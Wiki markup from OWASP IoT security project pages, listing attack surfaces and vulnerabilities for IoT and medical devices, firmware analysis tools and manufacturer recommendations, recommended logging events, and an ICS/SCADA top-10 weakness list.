* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon. For information on how to get started with contributing, see the "Project Task List" in the download section. <br />
<br />
{{Social Media Links}}<br />
<br />
